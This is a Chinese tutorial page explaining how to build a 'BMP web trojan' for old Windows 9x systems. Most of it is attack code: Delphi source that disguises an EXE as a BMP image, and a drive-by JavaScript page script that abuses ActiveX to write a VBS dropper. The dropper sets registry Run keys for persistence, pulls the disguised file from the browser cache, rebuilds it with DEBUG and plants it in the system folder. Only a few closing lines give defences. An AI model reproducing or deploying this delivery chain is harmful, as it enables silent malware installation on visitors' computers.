手机
当前位置:查字典教程网 >实用技巧 >漏洞研究 >利用图片做木马应用完全解析
利用图片做木马应用完全解析
摘要:何谓BMP网页木马?它和过去早就用臭了的MIME头漏洞的木马不同,MIME木马是把一个EXE文件用MIME编码为一个EML(OUTLOOK信...

何谓BMP网页木马?它和过去早就用臭了的MIME头漏洞的木马不同,MIME木马是把一个EXE文件用MIME编码为一个EML(OUTLOOK信件)文件,放到网页上利用IE和OE的编码漏洞实现自动下载和执行.

然而BMP木马就不同,它把一个EXE文件伪装成一个BMP图片文件,欺骗IE自动下载,再利用网页中的JAVAscript脚本查找客户端的Internet临时文件夹,找到下载后的BMP文件,把它拷贝到TEMP目录.再编写一个脚本把找到的BMP文件用DEBUG还原成EXE,并把它放到注册表启动项中,在下一次开机时执行.但是这种技术只能在9X下发挥作用,对于2K,XP来说是无能为力了.

看上去好象很复杂,下面我们一步一步来:

1)EXE变BMP的方法.

大家自己去查查BMP文件资料就会知道,BMP文件的文件头有54个字节,简单来说里面包含了BMP文件的长宽,位数,文件大小,数据区长度,我们只要在EXE文件的文件头前面添加相应的BMP文件头(当然BMP文件头里面的数据要符合EXE文件的大小啦),这样就可以欺骗IE下载该BMP文件,开始我们用JPG文件做过试验,发现如果文件头不正确的话,IE是不会下载的,转换代码如下:

programexe2bmp;

uses

Windows,

SysUtils;

varlen,row,col,fs:DWORD;

buffer:array[0..255]ofchar;

fd:WIN32_FIND_DATA;

h,hw:THandle;

begin

if(ParamStr(1)<>'')and(ParamStr(2)<>'')thenbegin//如果运行后没有两个参数则退出

ifFileExists(ParamStr(1))thenbegin

FindFirstFile(Pchar(ParamStr(1)),fd);

fs:=fd.nFileSizeLow;

col:=4;

whiletruedobegin

if(fsmod12)=0thenbegin

len:=fs;

endelselen:=fs+12-(fsmod12);

row:=lendivcoldiv3;

ifrow>colthenbegin

col:=col+4;

endelseBreak;

end;

FillChar(buffer,256,0);

{一下为BMP文件头数据}

Buffer[0]:='B';Buffer[1]:='M';

PDWORD(@buffer[18])^:=col;

PDWORD(@buffer[22])^:=row;

PDWORD(@buffer[34])^:=len;

PDWORD(@buffer[2])^:=len+54;

PDWORD(@buffer[10])^:=54;

PDWORD(@buffer[14])^:=40;

PWORD(@buffer[26])^:=1;

PWORD(@buffer[28])^:=24;

{写入文件}

hw:=CreateFile(Pchar(ParamStr(2)),GENERIC_WRITE,FILE_SHARE_READorFILE_SHARE_WRITE,nil,CREATE_ALWAYS,0,0);

h:=CreateFile(Pchar(ParamStr(1)),GENERIC_READ,FILE_SHARE_READorFILE_SHARE_WRITE,nil,OPEN_EXISTING,0,0);

WriteFile(hw,buffer,54,col,0);

repeat

ReadFile(h,buffer,256,col,0);

WriteFile(hw,buffer,col,col,0);

untilcol<>256;

WriteFile(hw,buffer,len-fs,col,0);

CloseHandle(h);

CloseHandle(hw);

end;

end;

end.

以上代码可以在DELPHI4,5,6中编译,就可以得到一个exe2bmp.exe文件.大家打开MSDOS方式,输入

exe2bmpmyexe.exemybmp.bmp

回车就可以把第二个参数所指定的EXE文件转换成BMP格式.

接着就是把这个BMP图片放到网页上了,如果大家打开过这张图片的话,一定发现这张BMP又花,颜色又单调.所以大家放在网页上最好用这样的格式

以下是放在网页上的脚本

document.write('');

functiondocsave()

{

a=document.applets[0];

a.setCLSID('{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}');

a.createInstance();

wsh=a.GetObject();

a.setCLSID('{0D43FE01-F093-11CF-8940-00A0C9054228}');

a.createInstance();

fso=a.GetObject();

varwinsys=fso.GetSpecialFolder(1);

varvbs=winsys+'s.vbs';

wsh.RegWrite

('HKCUSoftwareMicrosoftWindowsCurrentVersionRunvbs','wscript'+'"'+vbs+'"');

varst=fso.CreateTextFile(vbs,true);

st.WriteLine('OptionExplicit');

st.WriteLine('DimFSO,WSH,CACHE,str');

st.WriteLine('SetFSO=CreateObject("scripting.FileSystemObject")');

st.WriteLine('SetWSH=CreateObject("Wscript.Shell")');

st.WriteLine('CACHE=wsh.RegRead("HKCUSoftwareMicrosoftWindowsCurrentVersionExplorerShellFoldersCache")');

st.WriteLine('wsh.RegDelete("HKCUSoftwareMicrosoftWindowsCurrentVersionRunvbs")');

st.WriteLine('wsh.RegWrite"HKCUSoftwareMicrosoftWindowsCurrentVersionRunmp","tmp.exe"');

st.WriteLine('SearchBMPFilefso.GetFolder(CACHE),"mybmp[1].bmp"');

st.WriteLine('Wscript.Quit()');

st.WriteLine('FunctionSearchBMPFile(Folder,fname)');

st.WriteLine('DimSubFolder,File,Lt,tmp,winsys');

st.WriteLine('str=FSO.GetParentFolderName(folder)&""&folder.name&""&fname');

st.WriteLine('ifFSO.FileExists(str)then');

st.WriteLine('tmp=fso.GetSpecialFolder(2)&""');

st.WriteLine('winsys=fso.GetSpecialFolder(1)&""');

st.WriteLine('setFile=FSO.GetFile(str)');

st.WriteLine('File.Copy(tmp&"tmp.dat")');

st.WriteLine('File.Delete');

st.WriteLine('setLt=FSO.CreateTextFile(tmp&"tmp.in")');

st.WriteLine('Lt.WriteLine("rbx")');

st.WriteLine('Lt.WriteLine("0")');

st.WriteLine('Lt.WriteLine("rcx")');

st.WriteLine('Lt.WriteLine("1000")');

st.WriteLine('Lt.WriteLine("w136")');

st.WriteLine('Lt.WriteLine("q")');

st.WriteLine('Lt.Close');

st.WriteLine('WSH.Run"command/cdebug"&tmp&"tmp.dat<"&tmp&"tmp.in>"&tmp&"tmp.out",false,6');

st.WriteLine('OnErrorResumeNext');

st.WriteLine('FSO.GetFile(tmp&"tmp.dat").Copy(winsys&"tmp.exe")');

st.WriteLine('FSO.GetFile(tmp&"tmp.dat").Delete');

st.WriteLine('FSO.GetFile(tmp&"tmp.in").Delete');

st.WriteLine('FSO.GetFile(tmp&"tmp.out").Delete');

st.WriteLine('endif');

st.WriteLine('IfFolder.SubFolders.Count<>0Then');

st.WriteLine('ForEachSubFolderInFolder.SubFolders');

st.WriteLine('SearchBMPFileSubFolder,fname');

st.WriteLine('Next');

st.WriteLine('EndIf');

st.WriteLine('EndFunction');

st.Close();

}

setTimeout('docsave()',1000);

把该脚本保存为"js.js",在网页中插入:

<scriptsrc="js.js"></script>

该脚本主要会在本地机器的SYSTEM目录下生成一个“S.VBS”文件,该脚本文件会在下次开机时自动运行。主要用于从临时目录中找出mybmp[1].bmp文件。

“S.VBS”文件主要内容如下:

OptionExplicit

DimFSO,WSH,CACHE,str

SetFSO=CreateObject("scripting.FileSystemObject")

SetWSH=CreateObject("Wscript.Shell")

CACHE=wsh.RegRead("HKCUSoftwareMicrosoftWindowsCurrentVersionExplorerShellFoldersCache")

wsh.RegDelete("HKCUSoftwareMicrosoftWindowsCurrentVersionRunvbs")

wsh.RegWrite"HKCUSoftwareMicrosoftWindowsCurrentVersionRuntmp","tmp.exe"

SearchBMPFilefso.GetFolder(CACHE),"mybmp[1].bmp"

Wscript.Quit()

FunctionSearchBMPFile(Folder,fname)

DimSubFolder,File,Lt,tmp,winsys

'从临时文件夹中查找目标BMP图片

str=FSO.GetParentFolderName(folder)&""&folder.name&""&fname

ifFSO.FileExists(str)then

tmp=fso.GetSpecialFolder(2)&""

winsys=fso.GetSpecialFolder(1)&""

setFile=FSO.GetFile(str)

File.Copy(tmp&"tmp.dat")

File.Delete

'生成一个DEBUG脚本

setLt=FSO.CreateTextFile(tmp&"tmp.in")

Lt.WriteLine("rbx")

Lt.WriteLine("0")

Lt.WriteLine("rcx")

'下面一行的1000是十六进制,换回十进制是4096(该数字是你的EXE文件的大小)

Lt.WriteLine("1000")

Lt.WriteLine("w136")

Lt.WriteLine("q")

Lt.Close

WSH.Run"command/cdebug"&tmp&"tmp.dat<"&tmp&"tmp.in>"&tmp&"tmp.out",false,6

OnErrorResumeNext

FSO.GetFile(tmp&"tmp.dat").Copy(winsys&"tmp.exe")

FSO.GetFile(tmp&"tmp.dat").Delete

FSO.GetFile(tmp&"tmp.in").Delete

FSO.GetFile(tmp&"tmp.out").Delete

endif

IfFolder.SubFolders.Count<>0Then

ForEachSubFolderInFolder.SubFolders

SearchBMPFileSubFolder,fname

Next

EndIf

EndFunction

这个脚本会找出在临时文件夹中的bmp文件,并生成一个DEBUG的脚本,运行时会自动从BMP文件54字节处读去你指定大小的数据,并把它保存到tmp.dat中.后面的脚本再把它复制到SYSTEM的目录下.这个被还原的EXE文件会在下次重起的时候运行.这就是BMP木马的基本实现过程.

详细脚本代码请参考http://hotsky.363.net

防范方法:

最简单,删除或改名wscrpit.exe文件和DEBUG文件;

安装有效的杀毒软件,因为这些脚本有好多杀毒软件已经可以查出来了.

在条件允许的情况下,安装WIN2KSP3,尽量避免去一些不名来历的网站.

<scripttype=text/javascript></script><scriptsrc="http://pagead2.googlesyndication.com

/pagead/show_ads.js"type=text/javascript></script>

【利用图片做木马应用完全解析】相关文章:

ADSL密码大集合

backdoor病毒珍藏绝密源代码

利用xml+xsl给客户机添加超级管理帐户!

Serv-U 用户的另类盗取

最新dvbbs 7.1sql提权得shell

IDS入侵特征库创建实例解析

MSSQL自身存储过程的一个注入漏洞

并不神奇的Real影片木马

分析NtGodMode.exe干了什么

PJBlog存在SQL注入漏洞大家要快下补丁了

精品推荐
分类导航